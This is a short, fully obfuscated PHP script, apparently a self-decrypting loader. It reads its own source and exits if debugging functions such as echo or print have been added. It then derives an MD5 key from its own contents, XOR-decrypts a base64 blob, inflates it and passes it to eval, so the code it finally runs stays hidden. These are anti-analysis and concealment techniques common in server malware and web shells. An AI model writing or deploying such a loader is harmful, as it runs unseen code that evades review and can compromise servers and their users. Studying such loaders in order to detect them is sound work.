<?php
$fazafobokg="eecc3639262616fd7705ead1f6c4f1aa";
$joqfxyjfcx="00515b550207500b02060206000502560602085154055455070600075e090003";
$bwlvxhaen="tsHzwXocrPv8ezUw";
$wzmwzsatza=file_get_contents(__FILE__);
$bmqybwd=str_replace($bwlvxhaen,"",$wzmwzsatza);
if(strpos($bmqybwd,"ec"."ho")!==false||strpos($bmqybwd,"pr"."int")!==false||strpos($bmqybwd,"var_"."dump")!==false||strpos($bmqybwd,"file_put_"."contents")!==false||strpos($bmqybwd,"fw"."rite")!==false){die();}
$kohjmpfynpo=str_replace(array($fazafobokg,$joqfxyjfcx),array("SP_0344ed7e","KP_224e6ab2"),$wzmwzsatza);
$meaduimqqdz=md5($kohjmpfynpo);
$pztkizknpxru=hex2bin($joqfxyjfcx);
$tajgja="";
$rwopaufbnz=strlen($meaduimqqdz);
for($krfucznmms=0;$krfucznmms<$rwopaufbnz;$krfucznmms++){
    $tajgja.=chr(ord($pztkizknpxru[$krfucznmms])^ord($meaduimqqdz[$krfucznmms]));
}
$cctleb=base64_decode($bwlvxhaen);
$sgpjdlfssoz=strlen($cctleb);
$gxaffvyy="";
$ttoleyc=strlen($tajgja);
for($krfucznmms=0;$krfucznmms<$sgpjdlfssoz;$krfucznmms++){
    $gxaffvyy.=$cctleb[$krfucznmms]^$tajgja[$krfucznmms%$ttoleyc];
}
$huefxtxwsz="gz"."in"."fl"."ate";
eval($huefxtxwsz($gxaffvyy));
